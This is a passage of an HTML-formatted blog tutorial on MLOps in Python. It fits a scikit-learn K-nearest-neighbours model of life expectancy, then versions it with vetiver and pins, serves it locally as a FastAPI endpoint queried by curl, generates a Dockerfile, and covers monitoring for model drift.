&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.pipeline&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; Pipeline
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;sklearn.preprocessing&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; StandardScaler
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;target &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;life_expectancy&amp;#34;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;covariates &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;percentage_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;total_expenditure&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;population&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;bmi&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;schooling&amp;#34;&lt;/span&gt;,
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;y &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[target]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;X &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; data[covariates]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; Pipeline(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; [
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;&amp;#34;transform&amp;#34;&lt;/span&gt;, StandardScaler()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; (&lt;span style="color:#a5d6ff"&gt;&amp;#34;model&amp;#34;&lt;/span&gt;, KNeighborsRegressor()),
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; ]
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;fit(X, y)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Pipeline(steps=[(&amp;#39;transform&amp;#39;, StandardScaler()),&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; (&amp;#39;model&amp;#39;, KNeighborsRegressor())])&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Let’s break down what’s happened here:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;We selected our target variable (life expectancy) and the covariates
(features) that will be used to predict the target.&lt;/li&gt;
&lt;li&gt;We constructed a modelling pipeline which includes:
&lt;ul&gt;
&lt;li&gt;Preprocessing of input data via standardisation.&lt;/li&gt;
&lt;li&gt;&lt;em&gt;K&lt;/em&gt;-Nearest Neighbours regression.&lt;/li&gt;
&lt;/ul&gt;
&lt;/li&gt;
&lt;li&gt;In the final step, we fitted our model to the training data.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Usually at this point we would evaluate how our model performs on some
unseen test data. However, for brevity we’ll now go straight to the
MLOps steps.&lt;/p&gt;
&lt;h2 id="mlops"&gt;MLOps&lt;/h2&gt;
&lt;p&gt;In a typical MLOps workflow, we are setting up a continuous cycle in
which our trained model is deployed to a cloud environment, monitored in
this environment, and then retrained on the latest data. The cycle
repeats so that we are always maintaining a high model performance and
avoiding the dreaded model drift (more on this later).&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/mlops-flow.png" alt="A flow chart showing the typical MLOps workflow. We begin by importing and tidying our data sets. We then fit a model to this data, and this model is versioned and deployed to the cloud. After it is deployed we then monitor the model, and we repeat the cycle by retraining the model on the latest data to maintain an acceptable performance." style="display: block; margin: auto;" /&gt;
&lt;p&gt;From the diagram above, the crucial steps that set this workflow apart
from a typical data science project are model versioning, deployment and
monitoring. We will go through each of these in turn using vetiver.&lt;/p&gt;
&lt;p&gt;Before we can begin, we must convert our scikit-learn model into a
“vetiver model”:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;vetiver&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;v_model &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;VetiverModel(model, model_name&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;, prototype_data&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;X)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(type(v_model))
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; &amp;lt;class &amp;#39;vetiver.vetiver_model.VetiverModel&amp;#39;&amp;gt;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;description)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; A scikit-learn Pipeline model&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;print(v_model&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;metadata)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; VetiverMeta(user={}, version=None, url=None, required_pkgs=[&amp;#39;scikit-learn&amp;#39;], python_version=(3, 10, 12, &amp;#39;final&amp;#39;, 0))&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Our &lt;code&gt;VetiverModel&lt;/code&gt; object contains model metadata and dependencies
(including the Python packages used to train it and the current Python
version). The &lt;code&gt;model_name&lt;/code&gt; will be used to identify the model later on,
and the &lt;code&gt;prototype_data&lt;/code&gt; will provide some example data for the model
API (more on this below).&lt;/p&gt;
&lt;h3 id="model-versioning"&gt;Model versioning&lt;/h3&gt;
&lt;p&gt;In a cycle where our model is continuously being retrained, it is
important to ensure that we can retrieve any models that have previously
been deployed. Vetiver utilises the
&lt;a href="https://rstudio.github.io/pins-python/" rel="external"&gt;pins&lt;/a&gt; package for model
storage. A pin is simply a Python object (could be a variable, data
frame, function, …) which can be stored and retrieved at a later time.
Pins are stored in “pins boards”. Examples include:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Local storage on your device&lt;/li&gt;
&lt;li&gt;Google Drive&lt;/li&gt;
&lt;li&gt;Amazon S3&lt;/li&gt;
&lt;li&gt;Posit Connect&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Let’s set up a temporary pins board locally for storing our model:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#ff7b72"&gt;from&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;pins&lt;/span&gt; &lt;span style="color:#ff7b72"&gt;import&lt;/span&gt; board_temp
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; board_temp(
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; versioned&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;, allow_pickle_read&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;vetiver_pin_write(model_board, v_model)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Model Cards provide a framework for transparent, responsible reporting. &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Use the vetiver `.qmd` Quarto template as a place to start, &lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; with vetiver.model_card()&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Writing pin:&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Name: &amp;#39;KNN&amp;#39;&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; Version: 20250220T141808Z-af3d5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Enabling &lt;code&gt;allow_pickle_read&lt;/code&gt; will allow quick reloading of the model
later on, whenever we need it.&lt;/p&gt;
&lt;p&gt;At this stage our &lt;code&gt;VetiverModel&lt;/code&gt; object is now stored as a pin, and we
can view the full list of “KNN” model versions using:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;model_board&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;pin_versions(&lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; created hash version&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&amp;gt; 0 2025-02-20 14:18:08 af3d5 20250220T141808Z-af3d5&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As expected, we only have one version stored so far!&lt;/p&gt;
&lt;h3 id="model-deployment"&gt;Model deployment&lt;/h3&gt;
&lt;p&gt;If we want to share our model with other users (colleagues,
stakeholders, customers) we should deploy it to an endpoint on the cloud
where it can be easily shared. To keep things simple for this blog, and
to ensure the code examples provided here are fully reproducible, we
will just deploy our model to the localhost.&lt;/p&gt;
&lt;p&gt;First we have to construct a model API. This is a simple interface which
takes some input and gives us back some model predictions. Crucially,
APIs can be hosted on the cloud where they can receive input data via
HTTP requests.&lt;/p&gt;
&lt;p&gt;Our &lt;code&gt;VetiverModel&lt;/code&gt; object already contains all of the info necessary to
build an API using the &lt;a href="https://fastapi.tiangolo.com/" rel="external"&gt;FastAPI&lt;/a&gt;
framework:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;app &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;VetiverAPI(v_model, check_prototype&lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt;&lt;span style="color:#79c0ff"&gt;True&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;Running &lt;code&gt;app.run(port=8080)&lt;/code&gt; will start a local server for the model API
on port 8080. We are then presented with a simple graphical interface in
which we can run basic queries and generate predictions using our model.
The &lt;code&gt;prototype_data&lt;/code&gt; argument which we defined when constructing our
&lt;code&gt;VetiverModel&lt;/code&gt; (see above) is used here to provide some example input
data for queries:&lt;/p&gt;
&lt;img src="https://www.jumpingrivers.com/blog/vetiver-mlops-python-deployment/api_screenshot.png" alt="A screenshot of the user interface for the deployed model API. Some example input data is shown in a JSON format which can be ingested by the model. A try button is provided for the user to generate model predictions using this data. There are also buttons to clear the example data and fill in a new example." style="display: block; margin: auto;" /&gt;
&lt;p&gt;Alternatively we can also submit queries from the command line. The
graphical interface above provides template &lt;code&gt;curl&lt;/code&gt; commands which can be
copied into the command line and executed against the model. For
example, the input data shown in the above screenshot can be fed into
the model via a POST request:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-bash" data-lang="bash"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;curl -X POST &lt;span style="color:#a5d6ff"&gt;&amp;#34;http://127.0.0.1:8080/predict&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#34;Accept: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -H &lt;span style="color:#a5d6ff"&gt;&amp;#34;Content-Type: application/json&amp;#34;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#79c0ff"&gt;&lt;/span&gt; -d &lt;span style="color:#a5d6ff"&gt;&amp;#39;[{&amp;#34;percentage_expenditure&amp;#34;:71.27962362,&amp;#34;total_expenditure&amp;#34;:8.16,&amp;#34;population&amp;#34;:33736494,&amp;#34;bmi&amp;#34;:19.1,&amp;#34;schooling&amp;#34;:10.1}]&amp;#39;&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;\
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The same command would work for querying APIs on the cloud as long as
the IP address for the API endpoint (here it is &lt;a href="http://127.0.0.1" rel="external"&gt;http://127.0.0.1&lt;/a&gt;,
which points to the
&lt;a href="https://en.wikipedia.org/wiki/Localhost" rel="external"&gt;localhost&lt;/a&gt;) is updated
accordingly.&lt;/p&gt;
&lt;p&gt;Deploying your model locally is a great way to test that your API
behaves as you expect. What’s more, it’s free and does not require
setting up an account with a cloud provider! But how would we go about
deploying our model to the cloud?&lt;/p&gt;
&lt;p&gt;If you already have a server on &lt;a href="https://posit.co/products/enterprise/connect/" rel="external"&gt;Posit
Connect&lt;/a&gt;, it’s just a
case of running &lt;code&gt;vetiver.deploy_rsconnect()&lt;/code&gt; (see the &lt;a href="https://vetiver.posit.co/get-started/deploy.html" rel="external"&gt;Posit vetiver
documentation&lt;/a&gt; for
more details). If you don’t have Posit Connect, not to worry! Instead
you can start by running:&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-python" data-lang="python"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;vetiver&lt;span style="color:#ff7b72;font-weight:bold"&gt;.&lt;/span&gt;prepare_docker(model_board, &lt;span style="color:#a5d6ff"&gt;&amp;#34;KNN&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;This command is doing a lot of heavy lifting behind the scenes:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Lists the Python package dependencies in a
&lt;strong&gt;vetiver_requirements.txt&lt;/strong&gt; file.&lt;/li&gt;
&lt;li&gt;Stores the Python code for the model API in an &lt;strong&gt;app.py&lt;/strong&gt; file.&lt;/li&gt;
&lt;li&gt;Creates a &lt;strong&gt;Dockerfile&lt;/strong&gt; containing the Python version requirement for
the model and the docker commands for building and running the API. An
example is shown below:&lt;/li&gt;
&lt;/ul&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-docker" data-lang="docker"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# # Generated by the vetiver package; edit with care&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# start with python base image&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;FROM&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;python:3.10&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# create directory in container for vetiver files&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;WORKDIR&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;/vetiver&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# copy and install requirements&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; vetiver_requirements.txt /vetiver/requirements.txt&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;#&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;RUN&lt;/span&gt; pip install --no-cache-dir --upgrade -r /vetiver/requirements.txt&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# copy app file&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;COPY&lt;/span&gt; app.py /vetiver/app/app.py&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# expose port&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;EXPOSE&lt;/span&gt;&lt;span style="color:#6e7681"&gt; &lt;/span&gt;&lt;span style="color:#a5d6ff"&gt;8080&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# run vetiver API&lt;/span&gt;&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#f85149"&gt;&lt;/span&gt;&lt;span style="color:#ff7b72"&gt;CMD&lt;/span&gt; [&lt;span style="color:#a5d6ff"&gt;&amp;#34;uvicorn&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;app.app:api&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;--host&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;0.0.0.0&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;--port&amp;#34;&lt;/span&gt;, &lt;span style="color:#a5d6ff"&gt;&amp;#34;8080&amp;#34;&lt;/span&gt;]&lt;span style="color:#f85149"&gt;
&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;With these files uploaded to the cloud server of your choosing, the
&lt;code&gt;docker build&lt;/code&gt; command will take care of the rest. This process can be
automated on AWS, Google Cloud Run, Azure, and many other cloud
platforms.&lt;/p&gt;
&lt;h3 id="model-monitoring"&gt;Model monitoring&lt;/h3&gt;
&lt;p&gt;Success! Your model is now deployed and your users are interacting with
it. But this is only the beginning…&lt;/p&gt;
&lt;p&gt;Data changes! Over time you will notice various aspects of your data
changing in unexpected ways:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The way the data is distributed may change (&lt;strong&gt;data drift&lt;/strong&gt;).&lt;/li&gt;
&lt;li&gt;The relationship between the target variable and covariates may change
(&lt;strong&gt;concept drift&lt;/strong&gt;).&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;These two processes will conspire to create &lt;strong&gt;model drift&lt;/strong&gt;, where your
model predictions start to drift away from the true values. This is why
MLOps is not simply a one-off deployment. It is a continuous cycle in
which you will be retraining your model on the latest data on a regular
basis.&lt;/p&gt;
&lt;p&gt;While we will not be providing a full worked example of model drift
here, we will just mention some helpful functions provided by vetiver to
deal with this problem:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/compute_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.compute_metrics()&lt;/code&gt;&lt;/a&gt;:
computes keys metrics at specified time intervals, allowing us to
understand how the model performance varies over time.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/pin_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.pin_metrics()&lt;/code&gt;&lt;/a&gt;:
stores the model metrics in a pins board for future retrieval.&lt;/li&gt;
&lt;li&gt;&lt;a href="https://rstudio.github.io/vetiver-python/stable/reference/plot_metrics.html" rel="external"&gt;&lt;code&gt;vetiver.plot_metrics()&lt;/code&gt;&lt;/a&gt;:
plots the metrics over time.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You can get an idea of how these Python methods can be used by reading
our previous blog post where we &lt;a href="https://www.jumpingrivers.com/blog/vetiver-monitoring-mlops-deployment/#monitoring-our-model"&gt;monitored the model’s performance using
vetiver for
R&lt;/a&gt;.&lt;/p&gt;
&lt;p&gt;The metrics can be entirely defined by the user, and might include the
accuracy score for a classification model and the mean squared error for
a regression model. We can also make use of predefined scoring functions
from the &lt;code&gt;sklearn.metrics&lt;/code&gt; library.&lt;/p&gt;
&lt;p&gt;For more on model monitoring, check out the &lt;a href="https://vetiver.posit.co/get-started/monitor.html" rel="external"&gt;Posit vetiver
documentation&lt;/a&gt;.&lt;/p&gt;
&lt;h2 id="summary"&gt;Summary&lt;/h2&gt;
&lt;p&gt;Hopefully by reading this post you will have a better understanding of
MLOps and how to get started with MLOps in Python. Most importantly, you
don’t have to be an expert in AWS or Azure to get started! Vetiver
provides intuitive, easy-to-use functions for learning the crucial steps
of MLOps including versioning your model, building a model API, and
deploying your model using docker or Posit Connect.&lt;/p&gt;
&lt;p&gt;For some further reading, check out:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Our previous blog posts on &lt;a href="https://www.jumpingrivers.com/blog/?search=vetiver" rel="external"&gt;vetiver with
R&lt;/a&gt;.&lt;/li&gt;
&lt;li&gt;The &lt;a href="https://vetiver.posit.co/" rel="external"&gt;Posit vetiver documentation&lt;/a&gt;.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;
